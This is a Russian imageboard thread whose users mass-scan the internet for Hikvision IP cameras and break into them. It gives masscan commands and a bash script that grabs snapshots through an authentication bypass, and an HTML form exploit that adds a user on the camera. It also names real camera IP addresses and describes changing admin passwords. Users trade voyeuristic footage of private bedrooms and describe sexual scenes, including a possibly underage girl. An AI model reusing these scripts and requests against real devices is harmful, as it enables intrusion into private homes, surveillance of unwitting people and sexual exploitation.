У меня masscan после запуска закрывается.
Что делать?
Что делать?
А у тебя не USB модем? С USB модемами Masscan не работает.
вифи
просто открываю. а он сразу закрывается.
Подтверждаю, не работает. Вылет моментально
Все, допер, выставил в свойствах совместимость с семеркой (я не разбираюсь, но это может выручить) и запуск от имени администратора. Все заработало, уже еду на сгуху.
Чё там, суакпхацкир для 64-ых линупсов не замутил версию? Не собирается до сих пор?
суперхацкир, лол, фикс
Просканил всю Россию и просматривю скрины. Бл#$%, в какой жопы мы живём!!!
Всю жопу ты так не увидишь, камеры ставят самые успешные.
Помогите с массканом: когда сканирую диапазоны по этой команде "p8000 -iL targets.txt --rate=1000 -oX myscan.xml", всегда пишет "found=0", хотя Kport справляется отлично. Как это пофиксить?
даешь новые скрины кто че откопал. пора освежить тему
О, наше дело еще живёт? Алсо, нескриппи, а сканите ли вы как-нить по 80 пору той же гидрой? Больше ли профит?
Интерестно так же, сколько в определенном диапазоне будет камер на 80 порту висеть не имея открытого 8000? Или 80 порт это скорее редкость и его никого не пробрасывают, а бросают онли 8000 порт? Интересно статистическое наблюдение. Дахуа, кстати, достаточно?
Интерестно так же, сколько в определенном диапазоне будет камер на 80 порту висеть не имея открытого 8000? Или 80 порт это скорее редкость и его никого не пробрасывают, а бросают онли 8000 порт? Интересно статистическое наблюдение. Дахуа, кстати, достаточно?
На порт 80 или другие http порта интересно искать в shodan если есть api key.
Ебать, ахуенно. Что за страна?
США. Этот гандон пароль сменил. Вот тебе ип камеры 73.155.5.177
Подобрал. Не такой уж и сложный.
Двощ, смотри - я у мамы хаккер :))))
#!/usr/bin/env bash
#masscan -p8000 -iL hosts --rate=1400 | grep -Eo "([0-9]{1,3}[\.]){3}[0-9]{1,3}" > res.txt
INC=0
while read line
do
if wget -O "$line.jpg" --tries=1 --timeout 5 "http://$line/Streaming/channels/1/picture/?auth=YWRtaW46"
then
INC=$((INC+1))
else
rm -f "$line.jpg"
fi
done < res.txt
echo "Done - total: $INC"
по мотивам треда в /b
#!/usr/bin/env bash
#masscan -p8000 -iL hosts --rate=1400 | grep -Eo "([0-9]{1,3}[\.]){3}[0-9]{1,3}" > res.txt
INC=0
while read line
do
if wget -O "$line.jpg" --tries=1 --timeout 5 "http://$line/Streaming/channels/1/picture/?auth=YWRtaW46"
then
INC=$((INC+1))
else
rm -f "$line.jpg"
fi
done < res.txt
echo "Done - total: $INC"
по мотивам треда в /b
Причесал скриптик - и надо признать довольно лампово получилось.в
https://github.com/makaka-hacker/kikka
Скрипт по списку скачивает /Streaming/channels/1/picture/?auth=YWRtaW46
Количество годноты возросло в разы: тут вам и траходромы в бохатых квартирах и просто пидорашьи конуры и .т.д и т.п.
Но:
1) часть снимков выходит битая - не только jpg качается
2) я хз как в баше потоки организовать - поэтому всего один
3) не windows :0
4) Все равно надо добручивать - искать пасс от годной камеры
5) bash не айс для таких дел
Добра анону, который в /b тред создал
https://github.com/makaka-hacker/kikka
Скрипт по списку скачивает /Streaming/channels/1/picture/?auth=YWRtaW46
Количество годноты возросло в разы: тут вам и траходромы в бохатых квартирах и просто пидорашьи конуры и .т.д и т.п.
Но:
1) часть снимков выходит битая - не только jpg качается
2) я хз как в баше потоки организовать - поэтому всего один
3) не windows :0
4) Все равно надо добручивать - искать пасс от годной камеры
5) bash не айс для таких дел
Добра анону, который в /b тред создал
Это у тебя только скрины или подобрал пароль к какой нибудь?
LOL
Она его затроллила, а мужик оптимист
Зачем она, собственно?
Камеры ставят, в основном, магазины и склады. Причем, в таких тредах только самые нищие магазины и склады, у которых денег не хватило на нормальных специалистов, способных хотя бы пароль поменять.
> p8000
-p=8000
admin_12345_171.1.63.154_1
Филиал сосача ИРЛ.
Филиал сосача ИРЛ.
Под винду портируешь?
Это скрины камер с включенным веб интерфейсом.
Снимок с первого канала берется без пароля ( фича хикквижена :D )
В дальнейшем можно попробывать подобрать хиккой или же
https://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities
возможно, хотя пока от скрипта толка мало
портируй под винду пожалуйста
Нехилая уязвимость. Спасибо анон
Поменял пароль и спи спокойно
>-p=8000
так вообще сразу вырубается, есть другое решение нулевого поиска?
Ты ловишь по RTSP протоколу?
украинцы смотрят Шария
одна пидофилия в основном
Что у них там? я заинтригован
более!
Тот случай, когда толстожопые негры живут лучше тебя, анон.
бордель
Кстати, все эти камеры, обычно ИП камеры одиночки.
В суши-баре смотришь как тебе готовят сашими
Вообщем уязвимость эпическая. Я думаю ее устранят в следующей прошивке.
Остаётся найти метод брута этих камер. Большество из них блокирует ип после 6 попыток так что нужны другие методы.
Ксати, пробовал читать стрим через rtsp но там без пароля не проходит
rtps://ip:554/Streaming/channels/1/?auth=YWRtaW46
Ксати, пробовал читать стрим через rtsp но там без пароля не проходит
rtps://ip:554/Streaming/channels/1/?auth=YWRtaW46
При чём сдесь rtsp? эти камеры имеют вэб интерфейс. Сканируй восьмидесятые порты.
Я не про это а про то как видео получить ... Но это не важно теперь так как нашёл как добовлять новый юзер через веб интерфейс. Не работает на все камеры но есть уже успехи.
Могу поделиться методом в обмен на годноту
[email protected]
Примерное кол-во теоритически уязвимых устройств.
Не, под винду не умею - если так уж интересно, то androidфона хватит - даже рут права не нужны
Нет,это просто изображение :(
Хуйня на самом деле, я попробовал на паре камер -нихуя - видать уязвимы только камеры до 2013-2014 года
-з8000 же хиккой или же прокси
я сканирую сначала 8000 (стандартный порт) а затем 80
я не понимаю откуда столько годных камер? прошелся по Россие и Украине, нихуя годного не осталось, все просрали, в том году было лучше. Но этот анон выкладывает откуда-то берет годноту. Вангую что крысы все таки написали прогу которая меняет пароли к массивам новых камер на 8000 и потом крыса из этого массива по новому паролю отбирает годноту? У кого-нибудь есть инфа какой пароль на камерах сейчас?
Прочитай про уязвимость.
У поли сиськи няшные :)
Камера в хорошем месте
>download (43).jpg
ты там в ручную что ли скачиваешь?
Загружаю на ftp сервер, и от туда скачиваю вручную
Как и на чем это запускать? Где-то в треде мелько про андроидофон, но даже на нем файл kikka вообще не распознается.
А бля скажите как хикку запустить на линуксе? ./hikka? или че за хуйня помогите нубу.
Спасибо, охуенно.
собранный masscan из оппоста лежит в папке с киккой и scan.txt, чяднт?
блядь, гребанная недоось, еще надо установить надо сканер этот
Ты знаешь толк в извращениях - apt-get install masscan
или в скрипте добавлять что-то типа exec $(pwd)/masscan
chmod +x ? ikka алсо права на раздел надо смотреть )
./?ikka
Из терминала же -
https://github.com/makaka-hacker/kikka
Исправил пару ошибок
>пару ошибок
каких?
Я так понимаю, это камеры RTSP протокола, которые не имеют записи.
Если да, то есть отличный брут на C# то есть проблема окон решается по щелчку пальцев, останется только допилить цикличную скачку скринов.
Но у этих камер нет записи в 90% случаев.
Если да, то есть отличный брут на C# то есть проблема окон решается по щелчку пальцев, останется только допилить цикличную скачку скринов.
Но у этих камер нет записи в 90% случаев.
Сделаешь для окон?
Папки "22:01:54" не создавались на FAT разделе
Сканировал только 8000 порт
и еще по мелочи
rtsp требует логина и пароля, изображение нет
>цикличную скачку скринов
#### capture stream
"rec" )
echo "$2 -> rec_$2"
trap "echo EXIT; exit" SIGINT
mkdir "rec_$2"
while true
do
load "$2" "rec_$2/$(date +%s).jpg"
done
;;
Но, есть большой пиздец - камера начинает лагать при большой нагрузке - так что запилить если запилить скачивание в 60 потоков - ей хана
Не знаю будет видно на скрине или нет - но часть файлов 0 размера - я так понимаю камера двух анонов уже не тянет
Вот об этом поподробнее
То есть, ты конектишься без лога и пасса?
Не вкатываю в твою схему...
Получить видео можно не напрягаясь через SDK, кто знает python, на коленках за 3 минуты накатает.
Думаю для sdk нужен логин и пасс от камеры?
а для http://46.50.135.102/Streaming/channels/1/picture/?auth=YWRtaW46 не нужен
авторизоваться полюбому нужно, это базовая функция. Хотя бы логин но нужен.
Ты тупо берешь скрины с первого канала и все? не имея доступа к админке.
Камер без логина и пасса не существует. Ты дичь мне втираешь.
Открой глаза блеать http://46.50.135.102/Streaming/channels/1/picture/?auth=YWRtaW46
> Получить видео можно не напрягаясь через SDK, кто знает python, на коленках за 3 минуты накатает.
Так получи видео с той же 46.50.135.102 и нам обьясни - мы только рады будем
HiWatch - бюджетный бренд, разработанный компанией Hikvision, мировым лидером по производству систем видеонаблюдения.
Ну вот и все, теперь я все понял. А то без логина он конектится.
Ты дебил?
Не объяснишь по пунктам, где я дебил, пойдешь на хуй.
Маня плз http://base64.ru/
Все понял о чем ты - нет, мы не брутим admin:
Сия хуйня по неизвестной прихоти хиквиженов /Streaming/channels/1/picture/?auth=YWRtaW46 доступна независимо от пароля админа
Лучше бы тред почитал внимательно, чем бомбить
Юhttp://www.hikvision.msk.ru/forum/26-3729-1
Я не бомбил, у меня иммунитет к этим тредам:)
Короче мини щелочка на получение картинок)
Фап-фап по кадрам)
верни старую версию, у меня ни с того ни с сего во время сохранения скриншотов после 50 насканенных камер обрывается
Держи https://github.com/makaka-hacker/kikka/blob/9aa1f185a8fe3ff16e846472d2bf1089e1f431fa/kikka
Там вроде ничего не изменилось...
При какой опции обрывается? ( start или rec ?)
Как именно обрывается? Полностью вылетает? Или wget начинает тупить
start, просто останавливается как будто бы просканировал все хосты. Из 32000 хостов всего 73 скрина (в прошлый раз оборвалось на 56 скринах).
Проверил старую версию кикки и тоже самое .
rec ip нормально вроде работает, но проскакивают битые скрины, хз из за чего.
причем проверил ip после которого done - он в 157 строке списка.
Как соединить картинки в видео?
До 400 снимков- "Киностудия Windows Live" (Windows7). Импорт снимков в нужном порядке и задание длительности каждого из кадров около 0,03 сек.
Больше 400, когда эта программа не справляется- "Pinnacle Studio". Всё довольно быстро и качественно, много настроек. Единственное- долго думает при изменении длительности кадров
>>1046
VirtualDub.
1. File –> Open Video File
2. В выпадающем меню типа файла выставляем «Image sequence».
3. Выбираем первый файл.
При условии, что картинки пронумерованы по порядку, имеют одинаковое разрешение, формат и не закодированы в неведомый формат он их автоматически подтянет в один ролик. Если ругнется при открытии файла — переконвертируйте их все в BMP, например.
4. Video –> Frame Rate…
5. Выставляем желаемую скорость кадров.
6. Video –> Compression…
7. Выставляем кодек, которым собираемся сжимать поток.
8. File –> Save as AVI…
9. Сохраняем.
VirtualDub.
1. File –> Open Video File
2. В выпадающем меню типа файла выставляем «Image sequence».
3. Выбираем первый файл.
При условии, что картинки пронумерованы по порядку, имеют одинаковое разрешение, формат и не закодированы в неведомый формат он их автоматически подтянет в один ролик. Если ругнется при открытии файла — переконвертируйте их все в BMP, например.
4. Video –> Frame Rate…
5. Выставляем желаемую скорость кадров.
6. Video –> Compression…
7. Выставляем кодек, которым собираемся сжимать поток.
8. File –> Save as AVI…
9. Сохраняем.
похоже wget дохнет
Появляются ли логи в виде wget-0.log ?
Можно попробывать запустить bash +x kikka start твой файл
или лучше bash +x kikka brute файл с уже просканенными ip
спасибо
Аноны сколько камер вы доите одновременно?
В смысле?
нихуя себе нет, встал колом ща
Кстати,
У Полины на камере есть жд. Кому system user создать на этой камере в обмен на годноту? Пишите на [email protected]
У Полины на камере есть жд. Кому system user создать на этой камере в обмен на годноту? Пишите на [email protected]
это россия?
Москва
пароль стандартный был или ты подбирал?
I uploaded some masscanned countries, so you don't have to.
https://mega.nz/#!dgFEBSYK!cckgYmtoNhf7BzC6rNVdlZ4pzE4B5DZftFa_EI4cF-M
https://mega.nz/#!dgFEBSYK!cckgYmtoNhf7BzC6rNVdlZ4pzE4B5DZftFa_EI4cF-M
Есть что-нибудь гейское?
что за мода ебаться под порнуху?
Когда долго живешь с кем-то, то партнер уже не воспринимается, как сексуальный объект, а скорее, как окружающая обстановка или часть собственного тела, например, рука. Нужно что-то, что возбудит.
Thanks bro. Huli na pendosckom bazarysh tut&?
Рашка?
> партнер уже не воспринимается, как сексуальный объект
почему? Тяночка же ахуенная на первом видео
Для тебя охуенная, для него обыденная.
У них же там иконы!!!
Ну что за богохульники!! Содомиты!!!
На первом видео там шлюша. К ней клиенты заходят
Я могу добавить нового не зная пыроль админа. До здраствует хиквижн
Как?
Это невозможно.
Опять ты, дебил.
Дай, ИП и докажу
Прокатывает с любым хиквиженом или нужна определенная модель/прошивка? Для этого фокуса нужно что бы был разрешен анонимный вход?
Прокатывает если получяется сделать скрин методом вышеуказаном
Во всех случаях?
До сих пор во всех случаях
Ну, анон, что б тему не палить совсем, намекни хоть куда параметры передавать? А дальше мы уж сами додумаемся
Дам только один намёк. Читайте документацию PSIA
ты через GET нового юзверя скармливаешь?
PUT
ISAPI/Security или через /doc/page ??
он врет, наличие возможности посмотреть картину с камеры без доступа в админку - единственная уязвимость, которую прикрыли в новых прошивках.
Едниственое что не получается, это изменить права нового пользовотеля, то есть после создания он не имеет никаких прав :(
По этому приходится просто менять пароль админа. Это делается очень лехко
ISAPI/Security или через /doc/page ??
Каким образом ты собираешься добавлять нового пользователя если у тебя нет пароля от admin?
Security
А каким оброзом ты качаешь скрин не имеея пароль админа?
doc/page это просто хтмл странички
>менять пароль админа
толсто, т.к. пароль может сменить только суперпользователь, т.е сам админ.
?auth=YWRtaW46
это уязвимость камеры без доступа к видеопотоку, а тем более к настройкам.
Ну не хочешь верить, не верь ... я больше не буду никого убеждать а просто буду искать годноты.
Если ктото сумеет создать ногого пользовотеля с правами просмотра тогда пишите на мыло [email protected]
А как создать нового пользователя без прав?
если получается сменить пароль админа, то какие-то права все же имеются.
Поясни этот момент. Выложи скрин админки со списком пользователей.
Добавление юзера состоит из двух этапов
1. Создание юзера
2. Создание прав
Это два разных запросов. Первый запрос получается сделать а второй, пока ещё не знаю как
Чтобы поменять пароль любого пользовотеля (в том числе админа) используется первый запрос
напиши запрос
Это вы уже сами ищите. А то если оставлю сдесь, школьники все камеры просрут
создай на этой камере пользователя с логином admin паролем 12345
109.173.79.188
отклеилось
На этой чёто не получается
<statusCode>3</statusCode>
<statusString>Device Error</statusString>
А ногого создал без проблем: system:system123
как так?
Не знаю, первый раз такое. Дай другой ИП
145.255.18.250
>145.255.18.250
Я понял почему не получалось с предыдущей. Пароль 12345 слишком простой и камера не принимает. Вот поменял пароль админа на 123456789abc
Это всё через строку браузера делается или нужно знать соснольные команды на linux?
Я использую curl. Можно также с помощу Postman в Chrome
Сложно это всё, не могу даже осилить банальное подключение к камере без ввода пароля, вводя в строке браузера: http:\\логин:пароль@айпи:порт
Перекидывает все равно на главную страницу с формой.
все равно выводит стартовую страницу, с незаполненными полями.
Да, дейстивтельно. Там немножко по другому. Веб интерфейс использует куки для аутентификации
Пароль нужно писать в отдельном таге
<userName>test</userName>
<password>123456789abc</password>
все равно выдает:
<statusCode>5</statusCode>
<statusString>Invalid XML Format</statusString>
<subStatusCode>badXmlFormat</subStatusCode>
Вобшето нужно добовляти по одному юзеру а ты выпихал аж 3 сразу.
лол, я put и post перепутал, да и вообще уже мозги кипят, чему только не приходится учиться и вникать вуайеристу гуманитарию.
ЮХУУУУ!!!!
Получилась добовлять оператора с правом просмотра не торгая админа!!!!
Получилась добовлять оператора с правом просмотра не торгая админа!!!!
Круто, как тебе это удалось?
ты теперь сможешь просматривать любую камеру какую захочешь?
Только те с которых можно сделать скирн без пароля.
Ну раньше тоже мог, но нужно было трогать пароль админа ...
пили как сделал, хуле
ты гений, там столько годноты пропадает на этих камерах
Могу добавить для вас операторов. Вы только давайте ип адресса с годнотой. Например то что выкладывали скрины сдесь
Ладно, запущу вечером сканер, если найдется годная камера скину тебе на почту скрин.
Пруфы, Билли, нам нужны пруфы
Дай ИП и будет пруф
Я не понимаю как можно авторизоваться на камере без пароля admin
Выкидывает на авторизацию при отправке хмл, хотя камеру смотреть можно, чяднт?
Также как и просматривать скирны
по логину YWRtaW46 не авторизуется ни в одном из разделов isapi
Жду
На каком порту веб интерфейс?
вроде в этой нет веба. попробуй здесь
Я ведь обьеснял что проходит только с камерах с каторых можно сделать снимок с методом выше указаном
Ну я хуй его знает в каких камерах можно сделать снимок с веба. Как это проверить ?
Прочитай в начале треда
ой, в пизду еще красноглазить
Как это возможно? Ведь при просмотре картинки с первого канала не происходит авторизации, а если бы она происходила, то при переходе в режим просмотра не запрашивало бы логин и пароль, т.к сведения об успешной авторизации уже хранились в куках
Без авторизации /ISAPI/Security/UserPermission/1 не открыть, а метод с auth - не проходит
и то что есть баг с просмотром jpg производители сами признали и пофиксили новыми прошивками, но вот авторизация и изменение конфигурации это что-то невообразимое
И я про то же,не понимаю как это у него получается
пиздит пади
очередная аттеншнхорь
очередная аттеншнхорь
Анон. Хочешь добавлю юзера на эти камеры? Пиши на мыло
Пожалуйста не пали никому, опять все проебут как джва года назад, теперь камеры в стримах мопса и вольнова.
Я не палю как добавить. Но могу добавить в обмен на годноту
Хорошо, только не пали, я вечером тебе закину на почту скрины с камер к которым хотел бы получить доступ. Добра тебе
ОП этого волшебного метода - ХУЙ. У него нихуя не рабоатет. А замутил он это что бы выманивать годноту и кидать.
Расходимся
Расходимся
Если бы кинул когонибудь, уже написали бы здесь
если бы помог кому-то, то тоже бы написали
чтоб быстрее качали скрины добавьте в конце URL
&videoResolutionWidth=640&videoResolutionHeight=480
А то есть скрины каторые весят пе 2 МБ
&videoResolutionWidth=640&videoResolutionHeight=480
А то есть скрины каторые весят пе 2 МБ
Так чем больше весят тем лучше качество же.
Когда брутишь я думаю не так важна качество как скорость ...
3000 скринов за сутки, максимум 890кб скрин, основная масса меньше 250кб
Я на 10 тредах качал и 20к в с утра до вечера. Правда у меня своя програ в C++ А ип читая не из файла а из базы данных mysql
Ты программист?
Да
Анонист он)))
Не без того
Я думал здесь все програмисты
Антош, запили версию под винду плииз.\
Буду тебе годноту на почту кидать.
Возможно я не прав, но некоторые скрины в названии файла с адресом, я ради интереса взял диапазоны где они по идее должны быть, так вот не один адрес не нашелся как порт 8000. раз 5 просканил.
Какие скрины?
Аноним 27/05/17 Суб 19:07:55 №104362
В том то и дело, так показывает, но я же написал, в скане не находит.
чем сканишь ? И какой командой запускаешь?
Тоесть ты юзера добавить можешь а годноты найти нет?
У кого нибудь кроме него получилось добавить?
Можно ли в хикке сделал вывод списка не пробрученных камер?
нет.
я так понимаю -bf-threads это колличество потоков на одно камеру
-threads а это в общем?
Что за опция -check ? Почему она до сих пор эксперементальная? Она просто чекает если камера на заданном порту? Можно ли захуярить вывод только с этой опции?
-threads а это в общем?
Что за опция -check ? Почему она до сих пор эксперементальная? Она просто чекает если камера на заданном порту? Можно ли захуярить вывод только с этой опции?
Короче вывод я захуярил. hikka -threads 200 -check -csv list Только приходится в нотепаде заменять ,8000 на пустоту.
нихуя ньюфажки подтянулись
а я говорил что набегут школьники олококающие под видосики с кампрaнками на ютабе
как же я с вас проиграл. Если вы про 4 поста выше от вас дебилов, то я в в этом треде уже давно сижу. Просто понадобилось получить именно список ип чекнутых на камеру, и которые хикка не смог пробрутить.
сраная ньюфажина давно сидит в треде, бгг. Люди по три года в теме, а она тут в треде давно сидит - и перестала быть сраной ньюфажиной от этого
проиграл он. выиграй хоть раз, долбаеб
проиграл он. выиграй хоть раз, долбаеб
чет проиграл
лол
Еще сильнее проиграл с долбаеба.
Инцест или просто молодая с старым???
непохожи на пидорах
Эти тоже там порнуху смотрят что ли? Импотенты блядь
Нет, походу не порнушку, просто фильм или сериал
А че у нее рука на пизде?
usa?
Нет, ITA
Выложи видео как они ебутся
Было позовчера но архив короткий
Жаль.
Когда итальянская лолита хочет секса в 3 чеса ночи а папаша должен идти завтра утром на работу
Для тех кто нашли как добавлять юзеров совет:
Добовляйте юзерa только когда хотите просмотреть камеру а в конце удаляйте его. Таким оброзом камера будет долго жить. Я лично так делаю.
А ещё смотрите в настройках если камера записана на какойнибудь DDNS.
Добовляйте юзерa только когда хотите просмотреть камеру а в конце удаляйте его. Таким оброзом камера будет долго жить. Я лично так делаю.
А ещё смотрите в настройках если камера записана на какойнибудь DDNS.
ты лично дрочишь на пустой экран
где пруфы?
где пруфы?
так он ее не трахнул в итоге? и почему у нее пизда такая волосатая?
Почему ты все время пишешь как аутист? У тебя с головой всё в порядке?
дай ip
Я думал сдесь люди меняются идеями и методами. Если не нравится мои посты тогда идите нахуй и пользуйтесь вашей хиккой или киккой как первобытные.
Всем всего хорошого
Bye Bye
да-да
кидалово не прокатило
улыбаемся и нахуй
кидалово не прокатило
улыбаемся и нахуй
Не трахнул, уснул.
А про пизду если хочешь узнать, проскань всю италию, зайди на камеру, включи двухсторонее аудио и спроси лично
съеби уже отсюда школьник аутист
Я сейчас швецию сканирую, надеюсь блондинистую няшку найти.
Папаша вернулся в обед покушать а лолита ничего не приготовила а всё ещё лежит в постели.
Она каждый день дома что ли сидит? Почему не работает или не учится или он ее обеспечивает?
По момему сейчас оттрахает
Такие детали не знаю, я вчера добыл эту камеру
ахуеть! пиши видео!
Зачем люди ставят камеру над кроватью? Чем они руководствуются? Смотрят на себя в записи и дрочат?
Ложная тревога, одевается.
Всё равно на камере есть ЖД. Завтра зайду посмотреть архив
hikkoй или же через веб интерфейс?
пиздец, а я то рассчитывал подрочить сейчас.
Походу они оба какието пожарники или спасатели. На футболке написано PA CROCE D'ORO
Типа залатой крест, что-то похожее на красный крест. Они людям помогают а я блять ....
веб
у них на стене фото выблядка, он умер?
Мэн на него подрачивает и возбуждается, а потом ебет уже эту старуху.
- ХУЛЕ ТЫ ТУТ РАЗЛЕГЛАСЬ, МРАЗЬ? ПИЗДУЙ В ШКОЛУ! ТЕБЕ ЕЩЕ В ИНСТИТУТ ПОСТУПАТЬ! В ШАРАГУ ХОЧЕШЬ ПОЙТИ КАК ТВОЯ МАМКА?
мимо-переводчик
>Я думал сдесь люди меняются идеями и методами.
Ну так поделись методом, хотя бы еще намеков попроще дай. Я же не кулхакер раскручивающий скулю в алиэкспресе, да и вроде не аутист с бхф, но все равно нихуя не понял.
>еще намеков попроще дай
а залупу тебе на воротник не навернуть?
Ты понимаешь что если я выложу сдесь метод то школота убьёт все камеры?
Какая бля старуха, ей лет 17-18
Не забывай про вoльнова, мопса и кампранки, и вспомни 2015 год, тысячи камер и годноты.
Нельзя дать школошникам с пикабу/мдк проебать всё как всегда.
лол, дебил в сарказм и относительность не может.
да и вообще сагу отключи дебил.
Я понимаю. Поэтому и написал что, дай еще намеков. А лучше дай ip где этот сплоит сработает, а я буду пытаться спрашивать не тупые твои ответы.
не ведись на жалостливые позывы, такие как он радостно гыгыгыкая меняли пароли на камерах, писали на экране "Вас взломал, Вася777", включали двустороннее аудио и т.д.
тада хуле ты тут забыл? пруфов никаких, один пиздеж.
вроде прощался? вот и пиздуй туда, где школота камеры не убьет, если есть с чем пиздовать, кроме влажных мечтаний
Нормальный чек выложил бы клевых видосиков, написал "учитесь, сынки" и купался бы в лучах славы - если ни как кул хацкер, то хоть как поставщик годноты для босоты. а тут ебала какая-то
толсто
а я и не троллю. вон чувак надыбал камеру в италии - не обломался поделиться. чо, сильно потратился на этом? нет, респект ему. все бы так делали
так и будут делать, ты просто успокойся и жди годноты.
Тот кто дабыл камеры в италии и тот кто умеет добовлять юзеров одит и тот же человек
не пизди, тот пишет без ошибок
пиздец, школоло на каникулах, модеры лучше закрывайте/удаляйте тред
Действительно, удалите всё, а то меня на душе хреново что залил видос с итальянцев а они жизни спасают
Стремно наврено на работе для всех казаться святым человеком, спасать чьи-то жизни жизни, а после работы трахать девочку которая во внучки годится
Они в месте работают
Скрин сам рисовал, леонардо?
Ой блядь, вуайеристы-ноулайферы жалеют счастливую и довольную жизнью пару из солнечной Италии. Тянку явно не принуждают, даже если он ее начальник.
Ну а нахуй ей какой старикан? Она ебнутая что ли?
хуенардо
Ты молодой и неопытный? Тянки очень быстро морально взрослеют. В 18 им уже неинтересно с инфантильными сверстниками, и они для общения и секса выбирают мужиков постарше. В 30 они ментальные бабки с интересами бабок, даже если внешне хорошо выглядят. Ну и природа в них заложила искать опытного взрослого самца, а не сопляка.
Не все такие, но многие.
Ну может лучше с неопытным чем со старым пузатым дедком?
бабло многое решает......выбирают сами
Нет, не лучше. Этот мужик в свои 45 абсолютно по всем параметрам обходит 20-летнего, кроме тела, но на внешность тянкам обычно пох.
>на внешность тянкам обычно пох
почему?
Ты меня спрашиваешь? Я откуда знаю. Так природа устроила. Ну это не значит, что можно чуханом ходить. Тянки в первую очередь смотрят на твой статус, поэтому седина, брюхо и плешивость их не отвращает, так как ими могут обладать солидные уважаемые мужчины.
>
>
Добавить юзера то просто, у него нет прав на просмотр даже если добавить как оператора. Вопрос в том как ему эти права предоставить. А пароль на админе сбрасывать не охото, так все камеры проеб@ть можно
Так делай как крысы, меняй пароль, они скриптом уже все дефолтные пароли поменяли, сегодня запустил хикку и за полчаса 100 штук насканилось, когда раньше за то же время было раз в 10 больше.
Я не про хикку и дефолтные пассы, Я про другое... баг с auth и т.д, Хикка давно уже не актуальна
Ты неправильно думаешь о тянках, не все из них продажные шкуры, которые ведутся на статус и деньги.
дай cveшку
но сути то это не меняет, что чем больше ажиотажа о теме связанной с камерами тем меньше остается годноты, и такие треды как этот - тому подтверждение, зачем вы подогреваете интерес отдыхающих школьникам, которые возомнили себя мамкиными хацкерами
Это не продажность в плохом смысле этого слова, им реально нравятся взрослые опытные мужчины, особенно если они чего-то добились. Они харизматичны, умеют обращаться с женщиной, шутить, уверены в себе, у них сложившийся взгляд на жизнь. Сложно объяснить, этот факт надо принять. Я думаю ты зеркалируешь свое ощущение ситуации "вот если бы я с 50-летней теткой ради ее денег", но это не то же самое, совсем не то.
Так ты ж вроде выше писал что у тебя получилось права добавить? не?
Вот это твой пост?
нет это не мой пост, может у него и получилось, а я только юзера могу добваить
Их ставят те, кто пользуется услугами клининга или услугами няничек. Что бы можно было смотреть что делают чужие люди у тебя дома пока тебя нет. А в маленькой спальне ты камеру в какой угол ни повесь, она получится над кроватью
почему ты так думаешь? ты тян?
Вангую в этой квартире - камера самая дорогая вещь
С 3 проиграл , лол
Ну, почему люди такие животные?
в каком смысле животные?
ну так любители детей как раз и нанимают няничек
что у бабы с титьками на 1ой?
Голый волосатый мужик тресет личинкой человека у себя между ногами
Ты беременых ни разу не видел?
Когда у тебя будут дети, поймёшь что это вся херня и нет никоких проблем ни для тебя, ни для малыша
У старика походу больше не встаёт. Помучилась, помучилась и ничего не получилась
Have you recorded anything?
fuck of from thread
No, why asking?
I was hoping
Почему бы и не добавится? и протроянить его под видом новой хикки 3.0.1a
Ахуйевший малый
если на камере нет жд, как можно вести запись чтобы не на свой комп?
находишь левый регистратор со свободными ай-пи каналами и прописываешь туда свою камеру. Потом с него сохраняешь и постишь сюда.
почему у меня по во всех случаях пишет Camera Abnormal и ничего не добавляется? Пробовал добавлять на разные регистраторы камеры разных производителей РВИ, ХК, Нави и т.д.
Под столом :)))))
Ох, лол!
Выкладывай моар, это ахуенно.
Там вообще женщины бывают?)
Да, но вместе с парня. Зашла одна пара искали крем для массажа
>искали крем для массажа
его же в аптеках продают
ты идиот? в какой блядь аптеке?
В любой аптеке продаются креиа лубрикпнты , идиот.
Есть что годное?
Серфю но пока и выложить нечего
Есть что годное?
Серфю но пока и выложить нечего
не пизди, в аптеке только гандоны продают
Ты в аптеке, когда был последний раз в 2001?
14.05.2017
Ну ты серьёзно? В моей мухосрани(15к) в каждой аптеке можно купить смазку. Ты где там блять проживаешь?
В Перми, а ты?
Антоновка Белгородская область.
как ты снял видео с этой камеры?
там жд
Не понял, ты записал и теперь кодируешь в вебм. Почему дата не сегодняшняя? Её что блять заблочили?
Ты прописал туда юзера своего, сбрутил или перенакатил админа со своим паролем? Есть видео как в бидэ подмываются? доставь плз!
Озабоченный что ли?
ну а ты мудак конечно, тебе сказали не постить сюда ничего чтобы школьникам хайп не поднимать, дебил блядь.
не, просто фетиш у меня такой.
Фетиш смотреть как кто-то моет жопу?
Походу камера уже сдохла ..
больше выкладывай в тред, мудак
почему жопу? пизду!
все годные уже здохли, что засветились тут
Ты хоть знаешь для чего биде нужно?
Кого блять покупала ? Хуй разберешь
а зачем дилдак фоткать на телефон?
>>1051
Умываться?
Умываться?
Этo камера ещё работает?
Работает, но какой-то пидор сбросил все параметры на дефолтные
Другой вариант, что какой-то пидор изменил пароль админа и владельцу небыло других вариантов как сбросить всё
3й вариант - какой то пидор постит скрины и записи в тред, набегают школьники, и крысят камеры проебывая всю годноту
Не понимаю как пост скрина или запись может убить камеру? Он ведь не постит ип
типа через скрин нельзя ip узнать
<html>
<body>
<form action="http://ipadress/PSIA/Security/AAA/users" method="POST" enctype="text/plain">
<input type="hidden" name="<?xml version" value="'1.0' encoding='utf-8'?><User><id>2</id><userName>test2</userName><password>Qq123456789</password><Extensions><bondIp><ipAddress>0.0.0.0</ipAddress></bondIp><attribute><inherent>true</inherent></attribute></Extensions></User>" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Вот сплоит для добавления пользователя. Пашет только на старых версиях прошивок.
Если ещё рабочий сплоит на перезагрузку камеры. Если надо выложу.
<body>
<form action="http://ipadress/PSIA/Security/AAA/users" method="POST" enctype="text/plain">
<input type="hidden" name="<?xml version" value="'1.0' encoding='utf-8'?><User><id>2</id><userName>test2</userName><password>Qq123456789</password><Extensions><bondIp><ipAddress>0.0.0.0</ipAddress></bondIp><attribute><inherent>true</inherent></attribute></Extensions></User>" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Вот сплоит для добавления пользователя. Пашет только на старых версиях прошивок.
Если ещё рабочий сплоит на перезагрузку камеры. Если надо выложу.
выкладывай
Напиши инструкцию куда этот код вписывать
ЛОЛ :))) Я уже испугался что кто-то выдал метод. Давайте школьники, пытайтесь добавить пользователеь этим сплойтом
в анус себе впиши пёс
пидор
давай на перезагрузку, я буду сейчас перезагружать вам все камеры
Подскажите какие книги почитать чтобы тоже стать хакером?
Уголовный кодекс
Анон, что за страна? город? Ни как не могу найти эту камеру, живая ещё?
а серьезно?
малолетние крысятнические ублюдки
